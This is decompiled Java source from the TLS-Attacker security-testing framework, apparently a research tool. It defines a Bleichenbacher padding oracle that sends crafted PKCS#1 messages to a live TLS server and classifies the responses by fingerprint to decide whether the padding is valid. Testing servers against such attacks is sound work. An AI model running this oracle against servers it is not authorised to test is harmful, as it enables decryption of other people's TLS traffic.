/*
 * Decompiled with CFR 0.152.
 */
package de.rub.nds.tlsattacker.attacks.pkcs1.oracles;

import de.rub.nds.tlsattacker.attacks.pkcs1.BleichenbacherWorkflowGenerator;
import de.rub.nds.tlsattacker.attacks.pkcs1.BleichenbacherWorkflowType;
import de.rub.nds.tlsattacker.attacks.pkcs1.oracles.Pkcs1Oracle;
import de.rub.nds.tlsattacker.attacks.util.response.EqualityError;
import de.rub.nds.tlsattacker.attacks.util.response.FingerPrintChecker;
import de.rub.nds.tlsattacker.attacks.util.response.ResponseExtractor;
import de.rub.nds.tlsattacker.attacks.util.response.ResponseFingerprint;
import de.rub.nds.tlsattacker.core.config.Config;
import de.rub.nds.tlsattacker.core.exceptions.WorkflowExecutionException;
import de.rub.nds.tlsattacker.core.state.State;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutor;
import de.rub.nds.tlsattacker.core.workflow.WorkflowExecutorFactory;
import de.rub.nds.tlsattacker.core.workflow.WorkflowTrace;
import de.rub.nds.tlsattacker.util.MathHelper;
import java.io.IOException;
import java.security.PublicKey;
import java.security.interfaces.RSAPublicKey;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class RealDirectMessagePkcs1Oracle
extends Pkcs1Oracle {
    private static final Logger LOGGER = LogManager.getLogger();
    private final Config config;
    private final ResponseFingerprint validResponseContent;
    private final ResponseFingerprint invalidResponseContent;
    private final BleichenbacherWorkflowType type;

    public RealDirectMessagePkcs1Oracle(PublicKey pubKey, Config config, ResponseFingerprint validResponseContent, ResponseFingerprint invalidResponseContent, BleichenbacherWorkflowType type) {
        this.publicKey = (RSAPublicKey)pubKey;
        this.blockSize = MathHelper.intceildiv((int)this.publicKey.getModulus().bitLength(), (int)8);
        this.validResponseContent = validResponseContent;
        this.invalidResponseContent = invalidResponseContent;
        this.type = type;
        this.config = config;
    }

    @Override
    public boolean checkPKCSConformity(byte[] msg) {
        Config tlsConfig = this.config;
        tlsConfig.setWorkflowExecutorShouldClose(false);
        WorkflowTrace trace = BleichenbacherWorkflowGenerator.generateWorkflow(tlsConfig, this.type, msg);
        State state = new State(tlsConfig, trace);
        WorkflowExecutor workflowExecutor = WorkflowExecutorFactory.createWorkflowExecutor(state.getConfig().getWorkflowExecutorType(), state);
        ++this.numberOfQueries;
        if (this.numberOfQueries % 1000L == 0L) {
            LOGGER.info("Number of queries so far: {}", (Object)this.numberOfQueries);
        }
        Boolean conform = false;
        try {
            workflowExecutor.executeWorkflow();
            ResponseFingerprint fingerprint = this.getFingerprint(state);
            this.clearConnections(state);
            if (fingerprint != null) {
                if (this.validResponseContent != null) {
                    conform = FingerPrintChecker.checkEquality(fingerprint, this.validResponseContent) == EqualityError.NONE;
                } else if (this.invalidResponseContent != null) {
                    conform = FingerPrintChecker.checkEquality(fingerprint, this.invalidResponseContent) != EqualityError.NONE;
                }
            }
        }
        catch (WorkflowExecutionException e) {
            LOGGER.debug(e.getLocalizedMessage(), (Throwable)e);
        }
        return conform;
    }

    private ResponseFingerprint getFingerprint(State state) {
        if (state.getWorkflowTrace().allActionsExecuted()) {
            ResponseFingerprint fingerprint = ResponseExtractor.getFingerprint(state);
            return fingerprint;
        }
        LOGGER.debug("Could not execute Workflow. Something went wrong... Check the debug output for more information");
        return null;
    }

    private void clearConnections(State state) {
        try {
            state.getTlsContext().getTransportHandler().closeConnection();
        }
        catch (IOException ex) {
            LOGGER.debug((Object)ex);
        }
    }
}

